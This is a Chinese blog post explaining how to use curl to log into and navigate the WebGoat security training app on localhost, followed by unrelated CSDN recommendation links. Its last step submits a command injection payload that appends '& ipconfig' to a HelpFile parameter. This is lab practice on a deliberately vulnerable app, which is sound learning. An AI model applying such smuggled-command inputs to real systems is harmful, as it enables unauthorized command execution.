curl摸拟浏览器运行WebGoat

最新推荐文章于 2022-08-12 11:19:33 发布
最新推荐文章于 2022-08-12 11:19:33 发布
阅读量672 收藏
点赞数
文章标签: 浏览器 menu command
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lvming404/article/details/5380685
版权

这个WebGoat有一些个性化的操作,所以记录在此

步骤:

 

1、 curl -u "guest:guest" -D cookie.jar "http://localhost/WebGoat/attack"  -v

登录进入WebGoat,并保存COOKIE

 

2、 curl -u "guest:guest" -b cookie.jar -d "start=Start+WebGoat" "http://localhost/WebGoat/attack" -v

提交start = Start WebGoat的表单,进入WebGoat的主页面。

此时,应该查看页面源代码中你想点的链接是什么

如:

 

<td><img src="images/buttons/lessonComplete.jpg"><a href="attack?Screen=497&menu=1200">Command Injection</a></td>

 

注意: WebGoat对不同的COOKIE,返回的页面链接并不相同,如果在后面的步骤中,你访问的是浏览器里查看到的链接,很可能那个链接就不存在,返回的是主页中的介绍信息,而不是你想访问的链接的内容。

另外,由于WebGoat是使用NTLM认证协议,所以每次curl,都得带-u "guest:guest"

 

3、curl -u "guest:guest" -b cookie.jar "http://localhost/WebGoat/attack?Screen=503&menu=1200" -v

这样就可以访问到你想访问的链接了。

 

4、如果要实现命令注入,提交如下:

curl -u "guest:guest" -b cookie.jar -d "HelpFile=AccessControlMatrix.help%22%20%26%20ipconfig&SUBMIT=View" "http://localhost/WebGoat/attack?Screen=497&menu=1200" -v > a.html

 

 

lvming404
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用PHP curl模拟浏览器抓取网站信息
12-18
PHP的cURL扩展允许开发者通过PHP代码来调用cURL库,实现模拟浏览器抓取网页信息、发送POST请求、管理cookies等功能。本文将详细解释如何使用PHP cURL进行网页抓取和模拟浏览器行为。 首先,了解cURL的基本概念。...
WebGoat——Authentication Flaws(一)
lay_loge的博客
04-17 710
一、Password Strength 密码强度 (1)题目: The Accounts of your Webapplication are only as save as the passwords. For this exercise, your job is to test several passwords on https://www.cnlab.ch/codecheck. You m...
使用curl模拟服务器http请求
enjoy.day
03-08 1180
curl 实践
curl 模拟浏览器头和refer及Curl模仿http浏览器常见命令
xiaoxuan2015
02-20 6561
linux下shell终端curl的post数据 curl -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" -e "http://post.html"  -d "2880[]=105&pid=2880&p=最佳&count=1&receipt=1&poll=投票" http://post.php 注释: -A "Mozill
curl的用法整理
因上努力,果上随缘。但行好事,莫问前程。
08-04 7675
Curl 是一个常用的命令行数据传输工具,可以方便的从命令行创建网络请求。它支持众多协议,支持如 HTTP, HTTPS, FTP, FTPS, SFTP, IMAP, SMTP, POP3 等等协议。Curl 提供了很多强大的功能,我们可以利用它来进行 HTTP 请求、上传/下载文件等,且支持 Cookie、用户密码验证、代理隧道、限速等。Curl 用于上传和下载指定 URL 的数据,它是一个客户端(client-side)工具,一个客户端 URL 工具。这也是它的名字的由来。...
shell执行curl_Linux Shell脚本编程--curl命令详解
weixin_32820457的博客
12-24 7740
用途说明curl命令是一个功能强大的网络工具,它能够通过http、ftp等方式下载文件,也能够上传文件。其实curl远不止前面所说的那些功能,大家可以通过man curl阅读手册页获取更多的信息。类似的工具还有wget。curl命令使用了libcurl库来实现,libcurl库常用在C程序中用来处理HTTP请求,curlpp是libcurl的一个C++封装,这几个东西可以用在抓取网页、网络监控等方...
PHP基于curl实现模拟微信浏览器打开微信链接的方法示例
10-17
主要介绍了PHP基于curl实现模拟微信浏览器打开微信链接的方法,结合实例形式分析了php使用curl通过设置HTTP_USER_AGENT实现模拟微信浏览器相关操作技巧,需要的朋友可以参考下
php使用curl伪造浏览器访问操作示例
10-16
这可以通过设置cURL选项来实现,特别是通过设置`User-Agent`头,模拟浏览器标识。 `User-Agent`是HTTP头中的一个字段,它告诉服务器发送请求的是什么类型的客户端。通常,浏览器会附带特定版本和平台的详细信息,如...
PHP curl模拟浏览器采集阿里巴巴的实现代码
10-28
在这个示例中,我们看到一个简单的PHP脚本,使用cURL模拟浏览器采集阿里巴巴网站的数据。首先,让我们逐行解析这段代码: 1. `set_time_limit(0);`:这行代码将PHP脚本的运行时间限制设置为0,意味着它将无限运行...
学习Web应用漏洞最好的教程----WebGoat
热门推荐
03-19 2万+
    WebGoat是一个用于讲解典型web漏洞的基于J2EE架构的web应用,他由著名的WEB应用安全研究组织OWASP精心设计并不断更新,目前的版本已经到了5.0。WebGoat本身是一系列教程,其中设计了大量的web缺陷,一步步的指导用户如何去利用这些漏洞进行攻击,同时也指出了如何在程序设计和编码时避免这些漏洞。Web应用程序的设计者和测试者都可以在WebGoat中找到自己感兴趣的部分。 
curl工具 很实用
06-16
比如说elastic search 采用curl工具很方便,直接设置系统变量,就可以使用curl命令
模拟请求curl工具
07-13
windows64的curl7命令发送请求调试工具,cmd启动文件夹中的bin/curl.exe命令,行执行请求(具体操作请百度)
rabbitmq http.api
qingfengpu99的专栏
11-15 3080
RabbitMQ:基本命令  rabbitmq的安装、启动和停止 rabbitmq-service.bat install  rabbitmq-service.bat start  rabbitmq-service.bat stop  列出所有queue rabbitmqctl.bat list_queues 列出指定queue的信息 rabbitmqctl
chrome调试curl
weixin_45143856的博客
07-19 2238
cURL 前后端联调,不可获取的知识点
模拟浏览器
qq_47560372的博客
08-12 1120
User-Agent:用户代理,网站的服务器通过识别UA(User-Agent)来确认用户使用的操作系统、浏览器内核等信息,因为有了这些信息说明用户是通过浏览器进行访问的,而不是爬虫进行爬取,因此通过UA识别就是反爬的一种手段。...
Https 请求工具(put,post,get)
weixin_34348111的博客
03-17 897
package com.util; /** * @Description: 类描述 * @author 作者 ll E-mail:80002132@sf-express.com * @version 1.0 * @date 创建时间:2017年3月15日 下午6:13:49 */ import java.io.ByteArrayOutputStream; impo...
curl命令行浏览器
雁南飞
03-30 3998
CURL? 嗯,说来话长了~~~~这东西现在已经是苹果机上内置的命令行工具之一了,可见其魅力之一斑1)二话不说,先从这里开始吧!curl http://www.yahoo.com回车之后,www.yahoo.com 的html就稀里哗啦地显示在屏幕上了~~~~~2)嗯,要想把读过来页面存下来,是不是要这样呢?curl http://www.yahoo.com > page.html当然可以,但不用
CURL 基于命令行的浏览器
12-19 1545
CURL? 嗯,说来话长了~~~~这东西现在已经是苹果机上内置的命令行工具之一了,可见其魅力之一斑1)二话不说,先从这里开始吧!curl http://www.yahoo.com回车之后,www.yahoo.com 的html就稀里哗啦地显示在屏幕上了~~~~~2)嗯,要想把读过来页面存下来,是不是要这样呢?curl http://www.yahoo.com > page.html当然可以
curl放在后台运行
最新发布
07-28
回答: 当使用cURL命令行工具时,可以将其放在后台运行。可以使用以下命令将cURL放在后台运行curl \[URL\] > /dev/null 2>&1 &。这个命令将会将cURL的输出重定向到/dev/null,这样就不会在终端上显示任何输出。同时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值